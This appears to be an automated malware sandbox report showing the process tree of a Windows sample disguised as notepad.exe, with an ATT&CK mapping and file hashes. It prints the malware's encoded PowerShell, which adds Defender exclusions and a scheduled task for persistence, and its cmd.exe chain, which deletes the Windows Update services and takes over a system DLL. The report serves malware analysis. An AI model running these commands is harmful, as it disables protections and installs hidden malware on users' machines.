C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGwAdQAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAE4AZQB0AHcAbwByAGsAXABDAG8AbgBuAGUAYwB0AGkAbwBuAHMAXABOAGUAdABBAGQAYQBwAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwB4AGEAIwA+AA=="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3808

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of SetWindowsHookEx
PID:2036

C:\Program Files\Microsoft\Network\Connections\NetAdapter.exe
"C:\Program Files\Microsoft\Network\Connections\NetAdapter.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAaAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYwByAHEAIwA+AA=="
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2196

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4440

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2388

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:3632

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4832

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:4416

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:4544

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:3064

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:4900

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1016

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:4424

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1504

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:2132

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4760

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1332

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4396

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2288

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2228

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4036

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:3224

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:3428

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:4592

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:5072

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:2784

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:4536

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:4636

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4820

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:5092

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:1140

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:1420

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:2952

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "zzlxmzsjdzsaiy"
4⤵
PID:4348

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe qvvyjkbokgbkmhj0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/aNuzWlVyvaykloKce04LxRLf10DrM/3k9g9sS9PemfzfvN8RtNdkqJkSowuPQK78gjzMTlJzRIJ7f2YY/kqQ/3n4p3o/Jo/wlEFjdq0QDtXGMJRe4FFuqO0Yy8vZ0CuRIRBtkJToIBX6tnnrB+DCeH8lw4/HjrP29vzzK5bvYAmgGbZyt65LYOeiNn/k1OebFzA5Z7eFcs4ZGZ7Prt65YMlAkoi2W0TRqRRKtkNPXL72uPawcm8L2A2qU+7XnXT3MIrFJOHPJJXL8xz6VtuLiRnDp85k9+8+3h3XusRn9hgkUCZcfsCQaK2iR4Vcoc29QYUfM+LX7tSY5OJNwfcOhl9brOVdzJ+YRUvqw8tbQ5moYuUra0pccOOEe5ZnktR39uyqOzWDc7P/uGc2QGB7BT0+D0nYcG2/TvGygyximzEL3C1fZEjPTJgSZNPW0wKWCVt59O79kDmyijicfA7eK5rrx8uw/P9PXlt4UlZuOB8=
4⤵
PID:4212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2568

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3920

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3920 -s 796
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:2216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:5004

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:3848

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3712 -s 856
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:532

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3468

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3052

C:\Users\Admin\AppData\Local\Temp\notepad.exe
"C:\Users\Admin\AppData\Local\Temp\notepad.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAaAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYwByAHEAIwA+AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4940

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:4232

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:4588

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:5104

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:788

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:796

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:832

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:3168

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:4844

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:2280

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1616

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4368

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4432

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4800

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:656

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1692

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:2088

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1272

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1240

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1892

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1500

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3384

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAYQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAHcAQQBkAFEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBOAEEARwBrAEEAWQB3AEIAeQBBAEcAOABBAGMAdwBCAHYAQQBHAFkAQQBkAEEAQgBjAEEARQA0AEEAWgBRAEIAMABBAEgAYwBBAGIAdwBCAHkAQQBHAHMAQQBYAEEAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEcAVQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEASABNAEEAWABBAEIATwBBAEcAVQBBAGQAQQBCAEIAQQBHAFEAQQBZAFEAQgB3AEEASABRAEEAWgBRAEIAeQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwAwAEEAVgBnAEIAbABBAEgASQBBAFkAZwBBAGcAQQBGAEkAQQBkAFEAQgB1AEEARQBFAEEAYwB3AEEAZwBBAEQAdwBBAEkAdwBCADQAQQBHAEUAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABoAHgAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwB5AGEAdQBqACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAZABxAGIAYQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAJQQ+BEEEQgQtAD8EQAQ+BEYENQRBBEEEIAA0BDsETwQgAEEEOwRDBDYEMQQgAFcAaQBuAGQAbwB3AHMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBkAGQAYgBsACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbgBvAHQAZQBwAGEAZAAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwATgBlAHQAdwBvAHIAawBcAEMAbwBuAG4AZQBjAHQAaQBvAG4AcwBcAE4AZQB0AEEAZABhAHAAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB5ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBxAG8AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnACUEPgRBBEIELQA/BEAEPgRGBDUEQQRBBCAANAQ7BE8EIABBBDsEQwQ2BDEEIABXAGkAbgBkAG8AdwBzACcAOwA="
3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2668

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2600

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2496

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1548

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1928

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1784

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1440

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1220

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1160

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1020

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5076

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft\Network\Connections\NetAdapter.exe
Filesize
4.6MB

MD5
f91a4f2fe37f1008f8f2b0d597dbd5fa

SHA1
3293698ca35076659fbaaac4868ba57afc3e560d

SHA256
c3031bd36d177c5468c59ef675d13ac9426a973e23df9c7749fb79e98a89bdc1

SHA512
64e0815402e0b2fa2dc43b23a129c2aeb1378d589924eec3105617f1da96e00568e59dda87040e4f2c43e74410398f98d007f0fb6be8fe835e2a205b29798bc1

Download Submit
C:\Program Files\Microsoft\Network\Connections\NetAdapter.exe
Filesize
4.6MB

MD5
f91a4f2fe37f1008f8f2b0d597dbd5fa

SHA1
3293698ca35076659fbaaac4868ba57afc3e560d

SHA256
